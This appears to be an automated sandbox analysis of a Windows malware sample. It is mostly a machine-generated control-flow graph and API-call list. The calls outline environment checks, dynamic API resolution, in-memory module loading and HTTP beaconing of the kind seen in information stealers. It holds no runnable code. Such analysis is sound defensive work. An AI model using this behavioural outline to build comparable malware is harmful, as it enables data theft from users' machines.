26765->26766 26767 4045c0 34 API calls 26766->26767 26768 403460 26767->26768 26769 4045c0 34 API calls 26768->26769 26770 403479 26769->26770 26771 4045c0 34 API calls 26770->26771 26772 403492 26771->26772 26773 4045c0 34 API calls 26772->26773 26774 4034ab 26773->26774 26775 4045c0 34 API calls 26774->26775 26776 4034c4 26775->26776 26777 4045c0 34 API calls 26776->26777 26778 4034dd 26777->26778 26779 4045c0 34 API calls 26778->26779 26780 4034f6 26779->26780 26781 4045c0 34 API calls 26780->26781 26782 40350f 26781->26782 26783 4045c0 34 API calls 26782->26783 26784 403528 26783->26784 26785 4045c0 34 API calls 26784->26785 26786 403541 26785->26786 26787 4045c0 34 API calls 26786->26787 26788 40355a 26787->26788 26789 4045c0 34 API calls 26788->26789 26790 403573 26789->26790 26791 4045c0 34 API calls 26790->26791 26792 40358c 26791->26792 26793 4045c0 34 API calls 26792->26793 26794 4035a5 26793->26794 26795 4045c0 34 API calls 26794->26795 26796 4035be 26795->26796 26797 4045c0 34 API calls 26796->26797 26798 4035d7 26797->26798 26799 4045c0 34 API calls 26798->26799 26800 4035f0 26799->26800 26801 4045c0 34 API calls 26800->26801 26802 403609 26801->26802 26803 4045c0 34 API calls 26802->26803 26804 403622 26803->26804 26805 4045c0 34 API calls 26804->26805 26806 40363b 26805->26806 26807 4045c0 34 API calls 26806->26807 26808 403654 26807->26808 26809 4045c0 34 API calls 26808->26809 26810 40366d 26809->26810 26811 4045c0 34 API calls 26810->26811 26812 403686 26811->26812 26813 4045c0 34 API calls 26812->26813 26814 40369f 26813->26814 26815 4045c0 34 API calls 26814->26815 26816 4036b8 26815->26816 26817 4045c0 34 API calls 26816->26817 26818 4036d1 26817->26818 26819 4045c0 34 API calls 26818->26819 26820 4036ea 26819->26820 26821 4045c0 34 API calls 26820->26821 26822 403703 26821->26822 26823 4045c0 34 API calls 26822->26823 26824 40371c 26823->26824 26825 4045c0 34 API calls 26824->26825 26826 403735 26825->26826 26827 4045c0 34 API calls 26826->26827 26828 40374e 26827->26828 26829 4045c0 34 API calls 26828->26829 26830 403767 26829->26830 26831 4045c0 34 API calls 26830->26831 26832 403780 26831->26832 26833 4045c0 34 API calls 26832->26833 26834 403799 26833->26834 26835 4045c0 34 API calls 26834->26835 26836 4037b2 26835->26836 26837 4045c0 34 API calls 26836->26837 26838 4037cb 26837->26838 26839 4045c0 34 API calls 26838->26839 26840 4037e4 26839->26840 26841 4045c0 34 API calls 26840->26841 26842 4037fd 26841->26842 26843 4045c0 34 API calls 26842->26843 26844 403816 26843->26844 26845 4045c0 34 API calls 26844->26845 26846 40382f 26845->26846 26847 4045c0 34 API calls 26846->26847 26848 403848 26847->26848 26849 4045c0 34 API calls 26848->26849 26850 403861 26849->26850 26851 4045c0 34 API calls 26850->26851 26852 40387a 26851->26852 26853 4045c0 34 API calls 26852->26853 26854 403893 26853->26854 26855 4045c0 34 API calls 26854->26855 26856 4038ac 26855->26856 26857 4045c0 34 API calls 26856->26857 26858 4038c5 26857->26858 26859 4045c0 34 API calls 26858->26859 26860 4038de 26859->26860 26861 4045c0 34 API calls 26860->26861 26862 4038f7 26861->26862 26863 4045c0 34 API calls 26862->26863 26864 403910 26863->26864 26865 4045c0 34 API calls 26864->26865 26866 403929 26865->26866 26867 4045c0 34 API calls 26866->26867 26868 403942 26867->26868 26869 4045c0 34 API calls 26868->26869 26870 40395b 26869->26870 26871 4045c0 34 API calls 26870->26871 26872 403974 26871->26872 26873 4045c0 34 API calls 26872->26873 26874 40398d 26873->26874 26875 4045c0 34 API calls 26874->26875 26876 4039a6 26875->26876 26877 4045c0 34 API calls 26876->26877 26878 4039bf 26877->26878 26879 4045c0 34 API calls 26878->26879 26880 4039d8 26879->26880 26881 4045c0 34 API calls 26880->26881 26882 4039f1 26881->26882 26883 4045c0 34 API calls 26882->26883 26884 403a0a 26883->26884 26885 4045c0 34 API calls 26884->26885 26886 403a23 26885->26886 26887 4045c0 34 API calls 26886->26887 26888 403a3c 26887->26888 26889 4045c0 34 API calls 26888->26889 26890 403a55 26889->26890 26891 4045c0 34 API calls 26890->26891 26892 403a6e 26891->26892 26893 4045c0 34 API calls 26892->26893 26894 403a87 26893->26894 26895 4045c0 34 API calls 26894->26895 26896 403aa0 26895->26896 26897 4045c0 34 API calls 26896->26897 26898 403ab9 26897->26898 26899 4045c0 34 API calls 26898->26899 26900 403ad2 26899->26900 26901 4045c0 34 API calls 26900->26901 26902 403aeb 26901->26902 26903 4045c0 34 API calls 26902->26903 26904 403b04 26903->26904 26905 4045c0 34 API calls 26904->26905 26906 403b1d 26905->26906 26907 4045c0 34 API calls 26906->26907 26908 403b36 26907->26908 26909 4045c0 34 API calls 26908->26909 26910 403b4f 26909->26910 26911 4045c0 34 API calls 26910->26911 26912 403b68 26911->26912 26913 4045c0 34 API calls 26912->26913 26914 403b81 26913->26914 26915 4045c0 34 API calls 26914->26915 26916 403b9a 26915->26916 26917 4045c0 34 API calls 26916->26917 26918 403bb3 26917->26918 26919 4045c0 34 API calls 26918->26919 26920 403bcc 26919->26920 26921 4045c0 34 API calls 26920->26921 26922 403be5 26921->26922 26923 4045c0 34 API calls 26922->26923 26924 403bfe 26923->26924 26925 4045c0 34 API calls 26924->26925 26926 403c17 26925->26926 26927 4045c0 34 API calls 26926->26927 26928 403c30 26927->26928 26929 4045c0 34 API calls 26928->26929 26930 403c49 26929->26930 26931 4045c0 34 API calls 26930->26931 26932 403c62 26931->26932 26933 4045c0 34 API calls 26932->26933 26934 403c7b 26933->26934 26935 4045c0 34 API calls 26934->26935 26936 403c94 26935->26936 26937 4045c0 34 API calls 26936->26937 26938 403cad 26937->26938 26939 4045c0 34 API calls 26938->26939 26940 403cc6 26939->26940 26941 4045c0 34 API calls 26940->26941 26942 403cdf 26941->26942 26943 4045c0 34 API calls 26942->26943 26944 403cf8 26943->26944 26945 4045c0 34 API calls 26944->26945 26946 403d11 26945->26946 26947 4045c0 34 API calls 26946->26947 26948 403d2a 26947->26948 26949 4045c0 34 API calls 26948->26949 26950 403d43 26949->26950 26951 4045c0 34 API calls 26950->26951 26952 403d5c 26951->26952 26953 4045c0 34 API calls 26952->26953 26954 403d75 26953->26954 26955 4045c0 34 API calls 26954->26955 26956 403d8e 26955->26956 26957 4045c0 34 API calls 26956->26957 26958 403da7 26957->26958 26959 4045c0 34 API calls 26958->26959 26960 403dc0 26959->26960 26961 4045c0 34 API calls 26960->26961 26962 403dd9 26961->26962 26963 4045c0 34 API calls 26962->26963 26964 403df2 26963->26964 26965 4045c0 34 API calls 26964->26965 26966 403e0b 26965->26966 26967 4045c0 34 API calls 26966->26967 26968 403e24 26967->26968 26969 4045c0 34 API calls 26968->26969 26970 403e3d 26969->26970 26971 4045c0 34 API calls 26970->26971 26972 403e56 26971->26972 26973 4045c0 34 API calls 26972->26973 26974 403e6f 26973->26974 26975 4045c0 34 API calls 26974->26975 26976 403e88 26975->26976 26977 4045c0 34 API calls 26976->26977 26978 403ea1 26977->26978 26979 4045c0 34 API calls 26978->26979 26980 403eba 26979->26980 26981 4045c0 34 API calls 26980->26981 26982 403ed3 26981->26982 26983 4045c0 34 API calls 26982->26983 26984 403eec 26983->26984 26985 4045c0 34 API calls 26984->26985 26986 403f05 26985->26986 26987 4045c0 34 API calls 26986->26987 26988 403f1e 26987->26988 26989 4045c0 34 API calls 26988->26989 26990 403f37 26989->26990 26991 4045c0 34 API calls 26990->26991 26992 403f50 26991->26992 26993 4045c0 34 API calls 26992->26993 26994 403f69 26993->26994 26995 4045c0 34 API calls 26994->26995 26996 403f82 26995->26996 26997 4045c0 34 API calls 26996->26997 26998 403f9b 26997->26998 26999 4045c0 34 API calls 26998->26999 27000 403fb4 26999->27000 27001 4045c0 34 API calls 27000->27001 27002 403fcd 27001->27002 27003 4045c0 34 API calls 27002->27003 27004 403fe6 27003->27004 27005 4045c0 34 API calls 27004->27005 27006 403fff 27005->27006 27007 4045c0 34 API calls 27006->27007 27008 404018 27007->27008 27009 4045c0 34 API calls 27008->27009 27010 404031 27009->27010 27011 4045c0 34 API calls 27010->27011 27012 40404a 27011->27012 27013 4045c0 34 API calls 27012->27013 27014 404063 27013->27014 27015 4045c0 34 API calls 27014->27015 27016 40407c 27015->27016 27017 4045c0 34 API calls 27016->27017 27018 404095 27017->27018 27019 4045c0 34 API calls 27018->27019 27020 4040ae 27019->27020 27021 4045c0 34 API calls 27020->27021 27022 4040c7 27021->27022 27023 4045c0 34 API calls 27022->27023 27024 4040e0 27023->27024 27025 4045c0 34 API calls 27024->27025 27026 4040f9 27025->27026 27027 4045c0 34 API calls 27026->27027 27028 404112 27027->27028 27029 4045c0 34 API calls 27028->27029 27030 40412b 27029->27030 27031 4045c0 34 API calls 27030->27031 27032 404144 27031->27032 27033 4045c0 34 API calls 27032->27033 27034 40415d 27033->27034 27035 4045c0 34 API calls 27034->27035 27036 404176 27035->27036 27037 4045c0 34 API calls 27036->27037 27038 40418f 27037->27038 27039 4045c0 34 API calls 27038->27039 27040 4041a8 27039->27040 27041 4045c0 34 API calls 27040->27041 27042 4041c1 27041->27042 27043 4045c0 34 API calls 27042->27043 27044 4041da 27043->27044 27045 4045c0 34 API calls 27044->27045 27046 4041f3 27045->27046 27047 4045c0 34 API calls 27046->27047 27048 40420c 27047->27048 27049 4045c0 34 API calls 27048->27049 27050 404225 27049->27050 27051 4045c0 34 API calls 27050->27051 27052 40423e 27051->27052 27053 4045c0 34 API calls 27052->27053 27054 404257 27053->27054 27055 4045c0 34 API calls 27054->27055 27056 404270 27055->27056 27057 4045c0 34 API calls 27056->27057 27058 404289 27057->27058 27059 4045c0 34 API calls 27058->27059 27060 4042a2 27059->27060 27061 4045c0 34 API calls 27060->27061 27062 4042bb 27061->27062 27063 4045c0 34 API calls 27062->27063 27064 4042d4 27063->27064 27065 4045c0 34 API calls 27064->27065 27066 4042ed 27065->27066 27067 4045c0 34 API calls 27066->27067 27068 404306 27067->27068 27069 4045c0 34 API calls 27068->27069 27070 40431f 27069->27070 27071 4045c0 34 API calls 27070->27071 27072 404338 27071->27072 27073 4045c0 34 API calls 27072->27073 27074 404351 27073->27074 27075 4045c0 34 API calls 27074->27075 27076 40436a 27075->27076 27077 4045c0 34 API calls 27076->27077 27078 404383 27077->27078 27079 4045c0 34 API calls 27078->27079 27080 40439c 27079->27080 27081 4045c0 34 API calls 27080->27081 27082 4043b5 27081->27082 27083 4045c0 34 API calls 27082->27083 27084 4043ce 27083->27084 27085 4045c0 34 API calls 27084->27085 27086 4043e7 27085->27086 27087 4045c0 34 API calls 27086->27087 27088 404400 27087->27088 27089 4045c0 34 API calls 27088->27089 27090 404419 27089->27090 27091 4045c0 34 API calls 27090->27091 27092 404432 27091->27092 27093 4045c0 34 API calls 27092->27093 27094 40444b 27093->27094 27095 4045c0 34 API calls 27094->27095 27096 404464 27095->27096 27097 4045c0 34 API calls 27096->27097 27098 40447d 27097->27098 27099 4045c0 34 API calls 27098->27099 27100 404496 27099->27100 27101 4045c0 34 API calls 27100->27101 27102 4044af 27101->27102 27103 4045c0 34 API calls 27102->27103 27104 4044c8 27103->27104 27105 4045c0 34 API calls 27104->27105 27106 4044e1 27105->27106 27107 4045c0 34 API calls 27106->27107 27108 4044fa 27107->27108 27109 4045c0 34 API calls 27108->27109 27110 404513 27109->27110 27111 4045c0 34 API calls 27110->27111 27112 40452c 27111->27112 27113 4045c0 34 API calls 27112->27113 27114 404545 27113->27114 27115 4045c0 34 API calls 27114->27115 27116 40455e 27115->27116 27117 4045c0 34 API calls 27116->27117 27118 404577 27117->27118 27119 4045c0 34 API calls 27118->27119 27120 404590 27119->27120 27121 4045c0 34 API calls 27120->27121 27122 4045a9 27121->27122 27123 419c10 27122->27123 27124 419c20 43 API calls 27123->27124 27125 41a036 8 API calls 27123->27125 27124->27125 27126 41a146 27125->27126 27127 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27125->27127 27128 41a153 8 API calls 27126->27128 27129 41a216 27126->27129 27127->27126 27128->27129 27130 41a298 27129->27130 27131 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27129->27131 27132 41a2a5 6 API calls 27130->27132 27133 41a337 27130->27133 27131->27130 27132->27133 27134 41a344 9 API calls 27133->27134 27135 41a41f 27133->27135 27134->27135 27136 41a4a2 27135->27136 27137 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27135->27137 27138 41a4ab GetProcAddress GetProcAddress 27136->27138 27139 41a4dc 27136->27139 27137->27136 27138->27139 27140 41a515 27139->27140 27141 41a4e5 GetProcAddress GetProcAddress 27139->27141 27142 41a612 27140->27142 27143 41a522 10 API calls 27140->27143 27141->27140 27144 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27142->27144 27145 41a67d 27142->27145 27143->27142 27144->27145 27146 41a686 GetProcAddress 27145->27146 27147 41a69e 27145->27147 27146->27147 27148 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27147->27148 27149 415ca3 27147->27149 27148->27149 27150 401590 27149->27150 27476 401670 27150->27476 27153 41a7a0 lstrcpy 27154 4015b5 27153->27154 27155 41a7a0 lstrcpy 27154->27155 27156 4015c7 27155->27156 27157 41a7a0 lstrcpy 27156->27157 27158 4015d9 27157->27158 27159 41a7a0 lstrcpy 27158->27159 27160 401663 27159->27160 27161 415510 27160->27161 27162 415521 27161->27162 27163 41a820 2 API calls 27162->27163 27164 41552e 27163->27164 27165 41a820 2 API calls 27164->27165 27166 41553b 27165->27166 27167 41a820 2 API calls 27166->27167 27168 415548 27167->27168 27169 41a740 lstrcpy 27168->27169 27170 415555 27169->27170 27171 41a740 lstrcpy 27170->27171 27172 415562 27171->27172 27173 41a740 lstrcpy 27172->27173 27174 41556f 27173->27174 27175 41a740 lstrcpy 27174->27175 27214 41557c 27175->27214 27176 41a7a0 lstrcpy 27176->27214 27177 415643 StrCmpCA 27177->27214 27178 4156a0 StrCmpCA 27179 4157dc 27178->27179 27178->27214 27180 41a8a0 lstrcpy 27179->27180 27181 4157e8 27180->27181 27182 41a820 2 API calls 27181->27182 27184 4157f6 27182->27184 27183 41a820 lstrlenA lstrcpy 27183->27214 27186 41a820 2 API calls 27184->27186 27185 415856 StrCmpCA 27187 415991 27185->27187 27185->27214 27190 415805 27186->27190 27189 41a8a0 lstrcpy 27187->27189 27188 41a740 lstrcpy 27188->27214 27191 41599d 27189->27191 27192 401670 lstrcpy 27190->27192 27194 41a820 2 API calls 27191->27194 27215 415811 27192->27215 27193 401590 lstrcpy 27193->27214 27195 4159ab 27194->27195 27199 41a820 2 API calls 27195->27199 27196 415a0b StrCmpCA 27200 415a16 Sleep 27196->27200 27201 415a28 27196->27201 27197 4152c0 29 API calls 27197->27214 27198 4151f0 23 API calls 27198->27214 27202 4159ba 27199->27202 27200->27214 27203 41a8a0 lstrcpy 27201->27203 27205 401670 lstrcpy 27202->27205 27206 415a34 27203->27206 27204 41a8a0 lstrcpy 27204->27214 27205->27215 27207 41a820 2 API calls 27206->27207 27208 415a43 27207->27208 27209 41a820 2 API calls 27208->27209 27211 415a52 27209->27211 27210 41578a StrCmpCA 27210->27214 27212 401670 lstrcpy 27211->27212 27212->27215 27213 41593f StrCmpCA 27213->27214 27214->27176 27214->27177 27214->27178 27214->27183 27214->27185 27214->27188 27214->27193 27214->27196 27214->27197 27214->27198 27214->27204 27214->27210 27214->27213 27215->26269 27217 417553 GetVolumeInformationA 27216->27217 27218 41754c 27216->27218 27219 417591 27217->27219 27218->27217 27220 4175fc GetProcessHeap HeapAlloc 27219->27220 27221 417619 27220->27221 27222 417628 wsprintfA 27220->27222 27223 41a740 lstrcpy 27221->27223 27224 41a740 lstrcpy 27222->27224 27225 415da7 27223->27225 27224->27225 27225->26290 27227 41a7a0 lstrcpy 27226->27227 27228 404899 27227->27228 27485 4047b0 27228->27485 27230 4048a5 27231 41a740 lstrcpy 27230->27231 27232 4048d7 27231->27232 27233 41a740 lstrcpy 27232->27233 27234 4048e4 27233->27234 27235 41a740 lstrcpy 27234->27235 27236 4048f1 27235->27236 27237 41a740 lstrcpy 27236->27237 27238 4048fe 27237->27238 27239 41a740 lstrcpy 27238->27239 27240 40490b InternetOpenA StrCmpCA 27239->27240 27241 404944 27240->27241 27242 404ecb InternetCloseHandle 27241->27242 27493 418b60 27241->27493 27243 404ee8 27242->27243 27508 409ac0 CryptStringToBinaryA 27243->27508 27245 404963 27501 41a920 27245->27501 27248 404976 27250 41a8a0 lstrcpy 27248->27250 27255 40497f 27250->27255 27251 41a820 2 API calls 27252 404f05 27251->27252 27254 41a9b0 4 API calls 27252->27254 27253 404f27 ctype 27257 41a7a0 lstrcpy 27253->27257 27256 404f1b 27254->27256 27259 41a9b0 4 API calls 27255->27259 27258 41a8a0 lstrcpy 27256->27258 27270 404f57 27257->27270 27258->27253 27260 4049a9 27259->27260 27261 41a8a0 lstrcpy 27260->27261 27262 4049b2 27261->27262 27263 41a9b0 4 API calls 27262->27263 27264 4049d1 27263->27264 27265 41a8a0 lstrcpy 27264->27265 27266 4049da 27265->27266 27267 41a920 3 API calls 27266->27267 27268 4049f8 27267->27268 27269 41a8a0 lstrcpy 27268->27269 27271 404a01 27269->27271 27270->26293 27272 41a9b0 4 API calls 27271->27272 27273 404a20 27272->27273 27274 41a8a0 lstrcpy 27273->27274 27275 404a29 27274->27275 27276 41a9b0 4 API calls 27275->27276 27277 404a48 27276->27277 27278 41a8a0 lstrcpy 27277->27278 27279 404a51 27278->27279 27280 41a9b0 4 API calls 27279->27280 27281 404a7d 27280->27281 27282 41a920 3 API calls 27281->27282 27283 404a84 27282->27283 27284 41a8a0 lstrcpy 27283->27284 27285 404a8d 27284->27285 27286 404aa3 InternetConnectA 27285->27286 27286->27242 27287 404ad3 HttpOpenRequestA 27286->27287 27289 404b28 27287->27289 27290 404ebe InternetCloseHandle 27287->27290 27291 41a9b0 4 API calls 27289->27291 27290->27242 27292 404b3c 27291->27292 27293 41a8a0 lstrcpy 27292->27293 27294 404b45 27293->27294 27295 41a920 3 API calls 27294->27295 27296 404b63 27295->27296 27297 41a8a0 lstrcpy 27296->27297 27298 404b6c 27297->27298 27299 41a9b0 4 API calls 27298->27299 27300 404b8b 27299->27300 27301 41a8a0 lstrcpy 27300->27301 27302 404b94 27301->27302 27303 41a9b0 4 API calls 27302->27303 27304 404bb5 27303->27304 27305 41a8a0 lstrcpy 27304->27305 27306 404bbe 27305->27306 27307 41a9b0 4 API calls 27306->27307 27308 404bde 27307->27308 27309 41a8a0 lstrcpy 27308->27309 27310 404be7 27309->27310 27311 41a9b0 4 API calls 27310->27311 27312 404c06 27311->27312 27313 41a8a0 lstrcpy 27312->27313 27314 404c0f 27313->27314 27315 41a920 3 API calls 27314->27315 27316 404c2d 27315->27316 27317 41a8a0 lstrcpy 27316->27317 27318 404c36 27317->27318 27319 41a9b0 4 API calls 27318->27319 27320 404c55 27319->27320 27321 41a8a0 lstrcpy 27320->27321 27322 404c5e 27321->27322 27323 41a9b0 4 API calls 27322->27323 27324 404c7d 27323->27324 27325 41a8a0 lstrcpy 27324->27325 27326 404c86 27325->27326 27327 41a920 3 API calls 27326->27327 27328 404ca4 27327->27328 27329 41a8a0 lstrcpy 27328->27329 27330 404cad 27329->27330 27331 41a9b0 4 API calls 27330->27331 27332 404ccc 27331->27332 27333 41a8a0 lstrcpy 27332->27333 27334 404cd5 27333->27334 27335 41a9b0 4 API calls 27334->27335 27336 404cf6 27335->27336 27337 41a8a0 lstrcpy 27336->27337 27338 404cff 27337->27338 27339 41a9b0 4 API calls 27338->27339 27340 404d1f 27339->27340 27341 41a8a0 lstrcpy 27340->27341 27342 404d28 27341->27342 27343 41a9b0 4 API calls 27342->27343 27344 404d47 27343->27344 27345 41a8a0 lstrcpy 27344->27345 27346 404d50 27345->27346 27347 41a920 3 API calls 27346->27347 27348 404d6e 27347->27348 27349 41a8a0 lstrcpy 27348->27349 27350 404d77 27349->27350 27351 41a740 lstrcpy 27350->27351 27352 404d92 27351->27352 27353 41a920 3 API calls 27352->27353 27354 404db3 27353->27354 27355 41a920 3 API calls 27354->27355 27356 404dba 27355->27356 27357 41a8a0 lstrcpy 27356->27357 27358 404dc6 27357->27358 27359 404de7 lstrlenA 27358->27359 27360 404dfa 27359->27360 27361 404e03 lstrlenA 27360->27361 27507 41aad0 27361->27507 27363 404e13 HttpSendRequestA 27364 404e32 InternetReadFile 27363->27364 27365 404e67 InternetCloseHandle 27364->27365 27370 404e5e 27364->27370 27368 41a800 27365->27368 27367 41a9b0 4 API calls 27367->27370 27368->27290 27369 41a8a0 lstrcpy 27369->27370 27370->27364 27370->27365 27370->27367 27370->27369 27517 41aad0 27371->27517 27373 4117c4 StrCmpCA 27374 4117d7 27373->27374 27375 4117cf ExitProcess 27373->27375 27376 4117e7 strtok_s 27374->27376 27389 4117f4 27376->27389 27377 4119c2 27377->26295 27378 41199e strtok_s 27378->27389 27379 4118ad StrCmpCA 27379->27389 27380 4118cf StrCmpCA 27380->27389 27381 4118f1 StrCmpCA 27381->27389 27382 411951 StrCmpCA 27382->27389 27383 411970 StrCmpCA 27383->27389 27384 411913 StrCmpCA 27384->27389 27385 411932 StrCmpCA 27385->27389 27386 41185d StrCmpCA 27386->27389 27387 41187f StrCmpCA 27387->27389 27388 41a820 2 API calls 27388->27378 27389->27377 27389->27378 27389->27379 27389->27380 27389->27381 27389->27382 27389->27383 27389->27384 27389->27385 27389->27386 27389->27387 27389->27388 27390 41a820 lstrlenA lstrcpy 27389->27390 27390->27389 27391->26303 27392->26311 27393->26319 27394->26323 27518 4098d0 27395->27518 27397 410759 27398 410a38 27397->27398 27399 41077d 27397->27399 27400 401590 lstrcpy 27398->27400 27402 410799 StrCmpCA 27399->27402 27401 410a49 27400->27401 27524 410250 88 API calls 27401->27524 27404 4107a8 27402->27404 27430 410843 27402->27430 27406 41a7a0 lstrcpy 27404->27406 27405 410a4e 27405->26331 27408 4107c3 27406->27408 27407 410865 StrCmpCA 27410 410874 27407->27410 27447 41096b 27407->27447 27409 401590 lstrcpy 27408->27409 27411 41080c 27409->27411 27412 41a740 lstrcpy 27410->27412 27413 41a7a0 lstrcpy 27411->27413 27415 410881 27412->27415 27416 410823 27413->27416 27414 41099c StrCmpCA 27417 4109ab 27414->27417 27436 410a2d 27414->27436 27418 41a9b0 4 API calls 27415->27418 27419 41a7a0 lstrcpy 27416->27419 27420 401590 lstrcpy 27417->27420 27421 4108ac 27418->27421 27423 41083e 27419->27423 27424 4109f4 27420->27424 27422 41a920 3 API calls 27421->27422 27425 4108b3 27422->27425 27521 40fb00 152 API calls 27423->27521 27427 41a7a0 lstrcpy 27424->27427 27429 41a9b0 4 API calls 27425->27429 27428 410a0d 27427->27428 27431 41a7a0 lstrcpy 27428->27431 27432 4108ba 27429->27432 27430->27407 27433 410a28 27431->27433 27434 41a8a0 lstrcpy 27432->27434 27523 410030 149 API calls 27433->27523 27437 4108c3 27434->27437 27436->26331 27438 401590 lstrcpy 27437->27438 27439 410924 27438->27439 27440 41a7a0 lstrcpy 27439->27440 27441 410932 27440->27441 27442 41a7a0 lstrcpy 27441->27442 27443 41094b 27442->27443 27444 41a7a0 lstrcpy 27443->27444 27445 410966 27444->27445 27522 40fd60 152 API calls 27445->27522 27447->27414 27448->26301 27449->26309 27450->26317 27451->26327 27452->26337 27453->26339 27454->26343 27455->26357 27456->26361 27457->26360 27458->26356 27459->26360 27460->26379 27461->26363 27462->26365 27463->26369 27464->26374 27465->26376 27466->26382 27467->26385 27468->26392 27469->26414 27470->26418 27471->26417 27472->26413 27473->26417 27474->26427 27477 41a7a0 lstrcpy 27476->27477 27478 401683 27477->27478 27479 41a7a0 lstrcpy 27478->27479 27480 401695 27479->27480 27481 41a7a0 lstrcpy 27480->27481 27482 4016a7 27481->27482 27483 41a7a0 lstrcpy 27482->27483 27484 4015a3 27483->27484 27484->27153 27513 401030 27485->27513 27489 404838 lstrlenA 27516 41aad0 27489->27516 27491 404848 InternetCrackUrlA 27492 404867 27491->27492 27492->27230 27494 41a740 lstrcpy 27493->27494 27495 418b74 27494->27495 27496 41a740 lstrcpy 27495->27496 27497 418b82 GetSystemTime 27496->27497 27499 418b99 27497->27499 27498 41a7a0 lstrcpy 27500 418bfc 27498->27500 27499->27498 27500->27245 27503 41a931 27501->27503 27502 41a988 27504 41a7a0 lstrcpy 27502->27504 27503->27502 27505 41a968 lstrcpy lstrcatA 27503->27505 27506 41a994 27504->27506 27505->27502 27506->27248 27507->27363 27509 409af9 LocalAlloc 27508->27509 27510 404eee 27508->27510 27509->27510 27511 409b14 CryptStringToBinaryA 27509->27511 27510->27251 27510->27253 27511->27510 27512 409b39 LocalFree 27511->27512 27512->27510 27514 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27513->27514 27515 41aad0 27514->27515 27515->27489 27516->27491 27517->27373 27525 409880 ??2@YAPAXI 27518->27525 27520 4098e1 27520->27397 27521->27430 27522->27447 27523->27436 27524->27405 27528 406fb0 27525->27528 27527 4098ad ctype 27527->27520 27531 406d40 27528->27531 27532 406d63 27531->27532 27547 406d59 27531->27547 27549 406530 27532->27549 27536 406dbe 27536->27547 27561 4069b0 27536->27561 27540 406e4a 27541 406ee6 VirtualFree 27540->27541 27543 406ef7 27540->27543 27540->27547 27541->27543 27542 406f41 27542->27547 27581 4189f0 GetProcessHeap HeapFree 27542->27581 27543->27542 27545 406f26 FreeLibrary 27543->27545 27546 406f38 27543->27546 27545->27543 27580 4189f0 GetProcessHeap HeapFree 27546->27580 27547->27527 27551 406542 27549->27551 27550 406549 27550->27547 27555 406660 27550->27555 27551->27550 27552 4065ce 27551->27552 27582 418a10 GetProcessHeap HeapAlloc 27552->27582 27554 4065f0 27554->27550 27558 40668f VirtualAlloc 27555->27558 27557 406730 27559 406743 VirtualAlloc 27557->27559 27560 40673c 27557->27560 27558->27557 27558->27560 27559->27560 27560->27536 27562 4069d5 27561->27562 27563 4069c9 27561->27563 27562->27547 27574 406be0 27562->27574 27563->27562 27564 406a09 LoadLibraryA 27563->27564 27565 406a28 27564->27565 27566 406a32 27564->27566 27565->27562 27570 406ae0 27566->27570 27583 418a10 GetProcessHeap HeapAlloc 27566->27583 27568 406a8b 27568->27565 27571 406ad1 27568->27571 27572 406aad memcpy 27568->27572 27569 406ba8 GetProcAddress 27569->27565 27569->27570 27570->27565 27570->27569 27584 4189f0 GetProcessHeap HeapFree 27571->27584 27572->27571 27575 406c0d 27574->27575 27576 406cb5 27575->27576 27579 406bfb 27575->27579 27576->27540 27577 406c80 VirtualProtect 27578 406ca9 27577->27578 27577->27579 27578->27576 27579->27575 27579->27577 27580->27542 27581->27547 27582->27554 27583->27568 27584->27570 27686 411cd90 173 API calls 3 library calls 27719 416ab1 902 API calls 27687 4069f3 7 API calls 27655 411140b StrCmpCA strtok_s lstrlen lstrcpy 27656 411d0af RtlLeaveCriticalSection __initptd 27721 41cafe 219 API calls 5 library calls 27722 41132ae 22 API calls 27657 41130d0 9 API calls 27600 251fd92 VirtualAlloc CreateToolhelp32Snapshot Module32First 27660 4113823 7 API calls 26034 401190 26041 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26034->26041 26036 40119e 26037 4011cc 26036->26037 26043 417850 GetProcessHeap HeapAlloc GetUserNameA 26036->26043 26039 4011b7 26039->26037 26040 4011c4 ExitProcess 26039->26040 26042 417939 26041->26042 26042->26036 26044 4178c3 26043->26044 26044->26039 27661 41115b3 strtok_s 27754 41113c7 strtok_s strtok_s lstrlen lstrcpy 27730 41ce9f 69 API calls __amsg_exit 27664 4088a4 RaiseException task __CxxThrowException@8 27665 4180a5 GetProcessHeap HeapFree 27666 41130f9 7 API calls 27694 41b9b0 RtlUnwind 27585 251fda3 27586 251fdb2 27585->27586 27589 2520543 27586->27589 27590 252055e 27589->27590 27591 2520567 CreateToolhelp32Snapshot 27590->27591 27592 2520583 Module32First 27590->27592 27591->27590 27591->27592 27593 2520592 27592->27593 27594 251fdbb 27592->27594 27596 2520202 27593->27596 27597 252022d 27596->27597 27598 2520276 27597->27598 27599 252023e VirtualAlloc 27597->27599 27598->27598 27599->27598 27695 41135e4 9 API calls 27696 41119e7 StrCmpCA ExitProcess strtok_s strtok_s 27667 411cce9 162 API calls ___crtLCMapStringA

                      Control-flow Graph

                      APIs
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                      • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                      • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
